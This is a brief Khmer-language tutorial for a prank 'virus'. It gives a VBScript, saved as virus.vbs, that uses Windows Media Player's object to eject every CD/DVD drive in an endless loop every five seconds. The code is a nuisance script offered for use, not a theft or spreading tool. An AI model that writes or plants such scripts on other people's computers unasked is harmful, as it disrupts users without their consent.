កូដមេរោគ បិទ/បើក CD/DVD ROOM

កូដមេរោគ បិទ/បើក CD/DVD ROOM ដោយស្វ័យប្រវត្តិ

ថ្ងៃនេះយើងនឹងឃើញ នូវរបៀបសរសេរ កូដមេរោគ បិទ/បើក CD/DVD ROOM ដោយស្វ័យប្រវត្តិ ដោយវិធីងាយៗ ។ បន្ទាប់ពីដំណើរការមេរោគមួយនេះហើយ វានឹងធ្វើការបិទ/បើក នូវ CD/DVD ROOM នៃកុំព្យួទ័ររបស់លោកអ្នក ដោយស្វ័យប្រវត្តិ និងឥតឈប់ឈរ។
1ខាងក្រោមនេះជាកូដរបស់មេរោគ និងរបៀបអនុវត្ត

១. បើកកម្មវិធី Notepad រួចសរសេរកូដខាងក្រោម

 Set oWMP = CreateObject(“WMPlayer.OCX.7”)

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop

២. ធ្វើការ រក្សាទុក (Save) ដោយដាក់ឈ្មោះថា virus.vbs